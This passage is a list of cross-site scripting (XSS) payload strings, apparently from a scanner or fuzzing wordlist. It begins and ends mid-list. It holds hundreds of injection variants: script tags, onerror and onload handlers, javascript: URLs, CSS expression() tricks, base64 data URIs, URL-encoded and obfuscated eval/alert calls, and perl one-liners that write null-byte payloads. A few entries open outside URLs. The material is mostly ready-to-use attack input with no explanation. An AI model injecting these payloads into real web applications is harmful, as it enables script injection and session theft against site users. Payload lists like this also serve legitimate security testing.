alert(1); </script>", '"><script> var a=1\'; alert(1); </script>', "</ScrIpt><script> var a=1'; alert(1); </script>", "'><script> var a=1'; alert(1); </script>", "</ScrIpt><script> var a=1'; alert(1); </script>", '<script> var x = "X\\"; alert(1); </script>', '</ScrIpt><script> var x = "X\\"; alert(1); </script>', '"><script> var x = "X\\"; alert(1); </script>', '</ScrIpt><script> var x = "X\\"; alert(1); </script>', '\'><script> var x = "X\\"; alert(1); </script>', '</ScrIpt><script> var x = "X\\"; alert(1); </script>', '<img src="1" onerror="alert(1)">', '"><img src="1" onerror="alert(1)">', '\'><img src="1" onerror="alert(1)">', '<img src="" onload=alert(1)>', '"><img src="" onload=alert(1)>', '\'><img src="" onload=alert(1)>', '<script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '</ScrIpt><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '"><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '</ScrIpt><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '\'><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '</ScrIpt><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '<img src=1 onerror="alert(1)">', '"><img src=1 onerror="alert(1)">', '\'><img src=1 onerror="alert(1)">', '<img src=1 onerror"alert(1)">', '"><img src=1 onerror"alert(1)">', '\'><img src=1 onerror"alert(1)">', '<svg><script>lo<sv>gChr(1)</script></svg>', '"><svg><script>lo<sv>gChr(1)</script></svg>', "'><svg><script>lo<sv>gChr(1)</script></svg>", '<img src=# aaa;onerror="alert(1)">', '"><img src=# aaa;onerror="alert(1)">', '\'><img src=# aaa;onerror="alert(1)">', '<a href=x onerror=alert(1)>', '"><a href=x onerror=alert(1)>', "'><a href=x onerror=alert(1)>", '<script> var x = "asdf\\1 asdf"; alert(1); </script>', '</ScrIpt><script> var x = "asdf\\1 asdf"; alert(1); </script>', '"><script> var x = "asdf\\1 asdf"; alert(1); </script>', '</ScrIpt><script> var x = "asdf\\1 asdf"; 
alert(1); </script>', '\'><script> var x = "asdf\\1 asdf"; alert(1); </script>', '</ScrIpt><script> var x = "asdf\\1 asdf"; alert(1); </script>', '<img src=xx:xx;onerror=alert(1)>', '"><img src=xx:xx;onerror=alert(1)>', "'><img src=xx:xx;onerror=alert(1)>", '<img src=x > onerror="console.alert(document.getElementsByTagName(\'html\')[0].innerHTML)">', '"><img src=x > onerror="console.alert(document.getElementsByTagName(\'html\')[0].innerHTML)">', '\'><img src=x > onerror="console.alert(document.getElementsByTagName(\'html\')[0].innerHTML)">', "<script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", '"><script> chr=String.fromCharCode(1); result=\'\'; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>', "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "'><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "<script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", '"><script> chr=String.fromCharCode(1); result=\'\'; try{ result=encodeURI(chr); }catch(e){} 
if(!/%/.test(result)&&result.length) { ids.push(1); } </script>', "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "'><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", '<img src=x > onerror=alert(1)>', '"><img src=x > onerror=alert(1)>', "'><img src=x > onerror=alert(1)>", '<svg><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></svg>', '<img src=xx:xx onerror="alert(1);alert(1)">', '"><img src=xx:xx onerror="alert(1);alert(1)">', '\'><img src=xx:xx onerror="alert(1);alert(1)">', "<img src=xx:xx onerror=window[['alert']](1)>", '"><img src=xx:xx onerror=window[[\'alert\']](1)>', "'><img src=xx:xx onerror=window[['alert']](1)>", '"\'><img src="xx:xx" on error="alert(1);">', '<img src=xx:xx onerror=alert(1)>', '"><img src=xx:xx onerror=alert(1)>', "'><img src=xx:xx onerror=alert(1)>", '<img src=xx:xx onerror =alert(1);>', '"><img src=xx:xx onerror =alert(1);>', "'><img src=xx:xx onerror =alert(1);>", '<META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">', '"><META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">', '\'><META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">', '<meta http-equiv=refresh content="javascript:alert(\'1\')">', '"><meta http-equiv=refresh content="javascript:alert(\'1\')">', '\'><meta http-equiv=refresh content="javascript:alert(\'1\')">', '<a href="javascript:alert(1)">X</a>', '"><a 
href="javascript:alert(1)">X</a>', '\'><a href="javascript:alert(1)">X</a>', "<script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", "</ScrIpt><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", '"><script> document.cookie=\'X\'; if(document.cookie !== \'X\') { alert(1,document.cookie); } </script>', "</ScrIpt><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", "'><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", "</ScrIpt><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", 'htmlStr = \'<a href="javascript:alert(1)">X</a>', '"><a href="javascript:alert(1)">X</a>', '\'><a href="javascript:alert(1)">X</a>\'; document.getElementById(\'body\').innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);};', 'htmlStr = \'<a href="javascript:alert(1)">X</a>', '"><a href="javascript:alert(1)">X</a>', '\'><a href="javascript:alert(1)">X</a>\'; document.getElementById(\'body\').innerHTML = htmlStr; try { if(document.getElementById(\'body\').firstChild.protocol === \'javascript:\') { alert(1); } }catch(e){alert(1);};', '<img src=x:xx onerror="try {execScript(\'a=1\',\'vbs\');alert(1);}catch(e){alert(1);}">', '"><img src=x:xx onerror="try {execScript(\'a=1\',\'vbs\');alert(1);}catch(e){alert(1);}">', '\'><img src=x:xx onerror="try {execScript(\'a=1\',\'vbs\');alert(1);}catch(e){alert(1);}">', '<div style="color:red\'{} x:expression(alert(1))">.</div>', '"><div style="color:red\'{} x:expression(alert(1))">.</div>', '\'><div style="color:red\'{} x:expression(alert(1))">.</div>', "<img src='xx:x><img src=xx:x onerror=alert(1)>'>", '"><img src=\'xx:x><img src=xx:x onerror=alert(1)>\'>', "'><img src='xx:x><img src=xx:x onerror=alert(1)>'>", '<img src=\'xx:x\\ onerror="alert(1)">\'>', '"><img src=\'xx:x\\ onerror="alert(1)">\'>', '\'><img src=\'xx:x\\ 
onerror="alert(1)">\'>', '<img src=\'xx:x onerror="alert(1)">\'>', '"><img src=\'xx:x onerror="alert(1)">\'>', '\'><img src=\'xx:x onerror="alert(1)">\'>', '`"\'><img src="# onerror=alert(1)>', '<img src=xx:xx onerror="x=\'\\\',alert(1)//\'">', '"><img src=xx:xx onerror="x=\'\\\',alert(1)//\'">', '\'><img src=xx:xx onerror="x=\'\\\',alert(1)//\'">', '<script>alert(alert(1))</script>', '</ScrIpt><script>alert(alert(1))</script>', '"><script>alert(alert(1))</script>', '</ScrIpt><script>alert(alert(1))</script>', "'><script>alert(alert(1))</script>", '</ScrIpt><script>alert(alert(1))</script>', "<script>x='<script><img src=xx:xx onerror=alert(1)>", '"><img src=xx:xx onerror=alert(1)>', "'><img src=xx:xx onerror=alert(1)>';</script>", '<script>alert(1)<script></script>', '</ScrIpt><script>alert(1)<script></script>', '"><script>alert(1)<script></script>', '</ScrIpt><script>alert(1)<script></script>', "'><script>alert(1)<script></script>", '</ScrIpt><script>alert(1)<script></script>', '--><img src=xxx:x onerror=alert(1)> -->', '<img src=xx:xx# /onerror=alert(1)>', '"><img src=xx:xx# /onerror=alert(1)>', "'><img src=xx:xx# /onerror=alert(1)>", '<img src=xx:xx alt=`/onerror=alert(1)//`>', '"><img src=xx:xx alt=`/onerror=alert(1)//`>', "'><img src=xx:xx alt=`/onerror=alert(1)//`>", '<img src=xx:xx onerror=alert(1)>', '"><img src=xx:xx onerror=alert(1)>', "'><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>", '"><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>', "'><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>", '<script>alert(1,1</script//)</script>', '</ScrIpt><script>alert(1,1</script//)</script>', '"><script>alert(1,1</script//)</script>', '</ScrIpt><script>alert(1,1</script//)</script>', "'><script>alert(1,1</script//)</script>", '</ScrIpt><script>alert(1,1</script//)</script>', '<script>alert(1,1</script/)</script>', '</ScrIpt><script>alert(1,1</script/)</script>', '"><script>alert(1,1</script/)</script>', 
'</ScrIpt><script>alert(1,1</script/)</script>', "'><script>alert(1,1</script/)</script>", '</ScrIpt><script>alert(1,1</script/)</script>', '<body> ?iframe onload=confirm(/X/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(\'?\',\'<\')"> </body>', '"><body> ?iframe onload=confirm(/X/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(\'?\',\'<\')"> </body>', '\'><body> ?iframe onload=confirm(/X/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(\'?\',\'<\')"> </body>', '<b id="id1" x=begin0x9fa0end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '"><b id="id1" x=begin0x9fa0end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '\'><b id="id1" x=begin0x9fa0end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '<b id="id1" x=begin0x2924end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '"><b id="id1" x=begin0x2924end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '\'><b id="id1" x=begin0x2924end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '<img src=# onerror="alert(1)" >', '"><img src=# onerror="alert(1)" >', '\'><img src=# onerror="alert(1)" >', '<title>X<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></title>', '<div style="X:expression(alert(1))\\"></div>', '"><div style="X:expression(alert(1))\\"></div>', '\'><div style="X:expression(alert(1))\\"></div>', '<div style="X:expression(alert(1))\'"></div>', '"><div 
style="X:expression(alert(1))\'"></div>', '\'><div style="X:expression(alert(1))\'"></div>', '<div style="X:expression(alert(1))"></div>', '"><div style="X:expression(alert(1))"></div>', '\'><div style="X:expression(alert(1))"></div>', '<div style="X:expression(alert(1))">X/div>', '"><div style="X:expression(alert(1))">X/div>', '\'><div style="X:expression(alert(1))">X/div>', '<img src=1 title= x:xx/onerror=alert(1)>', '"><img src=1 title= x:xx/onerror=alert(1)>', "'><img src=1 title= x:xx/onerror=alert(1)>", '<script>if("x\\".length==2) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==2) { alert(1);}</script>', '"><script>if("x\\".length==2) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==2) { alert(1);}</script>', '\'><script>if("x\\".length==2) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==2) { alert(1);}</script>', '<script>if("x\\".length==1) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==1) { alert(1);}</script>', '"><script>if("x\\".length==1) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==1) { alert(1);}</script>', '\'><script>if("x\\".length==1) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==1) { alert(1);}</script>', '<img src=xxx:xxx title=1/onerror=alert(1)>', '"><img src=xxx:xxx title=1/onerror=alert(1)>', "'><img src=xxx:xxx title=1/onerror=alert(1)>", '<script>if("xx" == "xx") { alert(1);}</script>', '</ScrIpt><script>if("xx" == "xx") { alert(1);}</script>', '"><script>if("xx" == "xx") { alert(1);}</script>', '</ScrIpt><script>if("xx" == "xx") { alert(1);}</script>', '\'><script>if("xx" == "xx") { alert(1);}</script>', '</ScrIpt><script>if("xx" == "xx") { alert(1);}</script>', '<img src=x onError="javascript:alert(1)"/>', '"><img src=x onError="javascript:alert(1)"/>', '\'><img src=x onError="javascript:alert(1)"/>', '"`\'><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', 
"'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<script type="text/javascript">alert(1);</script>', '"><script type="text/javascript">alert(1);</script>', '\'><script type="text/javascript">alert(1);</script>', "<script charset='utf-8'>alert(1)</script>", '"><script charset=\'utf-8\'>alert(1)</script>', "'><script charset='utf-8'>alert(1)</script>", '<style></style><img src="about:blank" onerror=alert(1)//></style>', '"><style></style><img src="about:blank" onerror=alert(1)//></style>', '\'><style></style><img src="about:blank" onerror=alert(1)//></style>', "<script>a='X\\\\';alert(1)//X';</script>", "</ScrIpt><script>a='X\\\\';alert(1)//X';</script>", '"><script>a=\'X\\\\\';alert(1)//X\';</script>', "</ScrIpt><script>a='X\\\\';alert(1)//X';</script>", "'><script>a='X\\\\';alert(1)//X';</script>", "</ScrIpt><script>a='X\\\\';alert(1)//X';</script>", '<script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '</ScrIpt><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '"><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '</ScrIpt><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '\'><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '</ScrIpt><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '<div class="foo1">X</div> <script>document.getElementsByClassName(\'foo1\')[0]?alert(1):0</script>', '"><div class="foo1">X</div> <script>document.getElementsByClassName(\'foo1\')[0]?alert(1):0</script>', '\'><div class="foo1">X</div> <script>document.getElementsByClassName(\'foo1\')[0]?alert(1):0</script>', '"`\'/><img/onload=alert(1) src=""/>', '<!--<img src=xxx:x onerror=alert(1)> -->', '"><!--<img src=xxx:x onerror=alert(1)> -->', "'><!--<img src=xxx:x onerror=alert(1)> -->", '<script>/* */alert(1)// */</script>', '</ScrIpt><script>/* */alert(1)// */</script>', '"><script>/* */alert(1)// */</script>', '</ScrIpt><script>/* */alert(1)// */</script>', "'><script>/* 
*/alert(1)// */</script>", '</ScrIpt><script>/* */alert(1)// */</script>', '"\'`>X<div style="font-family:\'foo;x:expression(alert(1));/*\';">X', '"\'`>X<div style="font-family:\'foo\'x:expression(alert(1));/*\';">X', '"\'`><script>a=/X;;i=0;alert(1);a/i;</script>', '<a href="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>" />', '"\'`><p><svg><script>a=\'X;alert(1)//\';</script></p>', '<p><svg><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></p>', '<iframe src="vbscript:alert()></iframe>', '"><iframe src="vbscript:alert()></iframe>', '\'><iframe src="vbscript:alert()></iframe>', 'X<div style="x:expression(alert(1))">X', 'X<div style="xexpression(alert(1))">X', '<script src="data:text/plainalert(1)"></script>', '"><script src="data:text/plainalert(1)"></script>', '\'><script src="data:text/plainalert(1)"></script>', '<script src="data:,alert(1)"></script>', '"><script src="data:,alert(1)"></script>', '\'><script src="data:,alert(1)"></script>', '<script src="data:text/plain,alert(1)"></script>', '"><script src="data:text/plain,alert(1)"></script>', '\'><script src="data:text/plain,alert(1)"></script>', "<script> if ('a'.trim() === '') { alert(1); } </script>", "</ScrIpt><script> if ('a'.trim() === '') { alert(1); } </script>", '"><script> if (\'a\'.trim() === \'\') { alert(1); } </script>', "</ScrIpt><script> if ('a'.trim() === '') { alert(1); } </script>", "'><script> if ('a'.trim() === '') { alert(1); } </script>", "</ScrIpt><script> if ('a'.trim() === '') { alert(1); } </script>", '"\'`><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", 
'</ScrIpt><script>alert(1)</script>', '"\'`><img src=xxx:x onerror=alert(1)>', '\'`"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '`"\'><img src=xxx:x onerror=alert(1)>', '\'"`><script>/* *alert(1)// */</script>', '`\'"><script>window[\'alert\'](1)</script>', "\\u0031+\\u0031\\u005b'\\145\\166\\141\\154'\\u005d\\u0028'\\141\\154\\145\\162\\164\\50\\61\\51'\\u0029", '\\u0030\\u005b\\u0022\\x65\\x76\\x61\\x6C"\\u005d\\u0028\\u0027\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\'\\u0029', "0['eval']('alert(1)')", '<a href="javascript:\\u0031+\\u0031\\u005b\'\\145\\166\\141\\154\'\\u005d\\u0028\'\\141\\154\\145\\162\\164\\50\\61\\51\'\\u0029">X</a>', '"><a href="javascript:\\u0031+\\u0031\\u005b\'\\145\\166\\141\\154\'\\u005d\\u0028\'\\141\\154\\145\\162\\164\\50\\61\\51\'\\u0029">X</a>', '\'><a href="javascript:\\u0031+\\u0031\\u005b\'\\145\\166\\141\\154\'\\u005d\\u0028\'\\141\\154\\145\\162\\164\\50\\61\\51\'\\u0029">X</a>', '<a href="javascript:\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029">X</a>', '"><a href="javascript:\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029">X</a>', '\'><a href="javascript:\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029">X</a>', "<input id='1'><input id=1><script>alert(1)</script>", '"><input id=\'1\'><input id=1><script>alert(1)</script>', "'><input id='1'><input id=1><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>', '"><a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x 
name=y>X</a><script>alert(x.y[0])</script>', '\'><a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>', '<a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>', '"><a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>', "'><a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>", '<a href="123" id=x>X</a><script>x=\'javascript:alert(1)\'//only in compat!;</script>', '"><a href="123" id=x>X</a><script>x=\'javascript:alert(1)\'//only in compat!;</script>', '\'><a href="123" id=x>X</a><script>x=\'javascript:alert(1)\'//only in compat!;</script>', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '"><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '\'><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '"><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '<form name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '"><form name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '\'><form name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '<iframe name=x></iframe>"></iframe><a 
href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>', '"><iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>', '\'><iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>', '%3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E', '"onmouseover="alert(1)"a="', "'onmouseover='alert(1)'a='", "'%20onmouseover=alert(1)'", '%22%20onmouseover=javascript:alert(1)%20%22', "\\');alert(1);//", ');alert(1)//', "');alert(1)//", '%26%2339;-alert(1)//', '%22);alert(1);//', '%E0<body onload=alert(1)>', '%00<body onload=alert(1)>', "X'%20alert(1)%2F%2F", 'X%22%20alert(1)%2F%2F', "%5C%5C'%2Balert(1)%3B%2F%2F", '%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E', 'alert(1)%3B', '%3Cscript%3Ea%3D%2FX%2F', 'alert(1)%3C%2Fscript%3E', '%22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E', 'X%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E', 'X%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E', '<SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '<META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">', '"><META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">', '\'><META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">', '<STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '"><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', 
'\'><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '\'><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">', '"><!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">', '\'><!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">', '<img src=a onerror=alert(1)', '"><img src=a onerror=alert(1)', "'><img src=a onerror=alert(1) %0A>", '"><img src=a onerror=alert(1) %0A>', "'><img src=a onerror=alert(1) %0A>", '<img src="x" class="\'\'onerror=alert(1)">', '"><img src="x" class="\'\'onerror=alert(1)">', '\'><img src="x" class="\'\'onerror=alert(1)">', '0<aside xmlns="x><img src=x onerror=alert(1)">1</aside>', '0<aside xmlns="x><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">1</aside>', '0<aside xmlns="foo:img src=x onerror=alert(1)>">123', '<p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '"><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '\'><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '<p style="font-family: \'foo\\27\\3b color\\3a expression(alert(1))/*', '"><p style="font-family: \'foo\\27\\3b color\\3a expression(alert(1))/*', '\'><p style="font-family: \'foo\\27\\3b color\\3a expression(alert(1))/*', '<p style="fon\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d alert\\28 1\\29\\3et-family:\'foobar\'">', '"><p style="fon\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d alert\\28 1\\29\\3et-family:\'foobar\'">', '\'><p style="fon\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d alert\\28 1\\29\\3et-family:\'foobar\'">', '<p style="filter: 
\'expression(alert(1))\'">', '"><p style="filter: \'expression(alert(1))\'">', '\'><p style="filter: \'expression(alert(1))\'">', '<svg><style><img src=x onerror=alert(1)></svg>', '"><svg><style><img src=x onerror=alert(1)></svg>', "'><svg><style><img src=x onerror=alert(1)></svg>", '<p style="font-family: \'foo&x5c;27&#x5c;3bx:expr&#x65;ession(alert(1))\'">', '"><p style="font-family: \'foo&x5c;27&#x5c;3bx:expr&#x65;ession(alert(1))\'">', '\'><p style="font-family: \'foo&x5c;27&#x5c;3bx:expr&#x65;ession(alert(1))\'">', '<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', '"><iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', '\'><iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', "<svg><script xlink:href=data:,window.open('http://www.opensecurity.in')></script", '"><svg><script xlink:href=data:,window.open(\'http://www.opensecurity.in\')></script', "'><svg><script xlink:href=data:,window.open('http://www.opensecurity.in')></script", 'http://www.opensecurity<script .in>alert(document.location)</script', ' <blink/ onmouseover=prompt(1)>OnMouseOver', '<div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div>', 'perl -e \'print "<IMG SRC=java\\0script:alert(\\"X\\")>";\' > out', 'perl -e \'print "<SCR\\0IPT>alert(\\"X\\")</SCR\\0IPT>";\' > out', 'perl -e \'print "<IMG SRC=java\\0script:alert(1)>";\'> out', 'window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()', 'window["ale"+"\\x72\\x74"]()', 'window["\\x61\\x6c\\x65\\x72\\x74"]()', "window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()", "window['ale'+'\\x72\\x74']()", "window['\\x61\\x6c\\x65\\x72\\x74']()", 'window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))', 'window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]', 
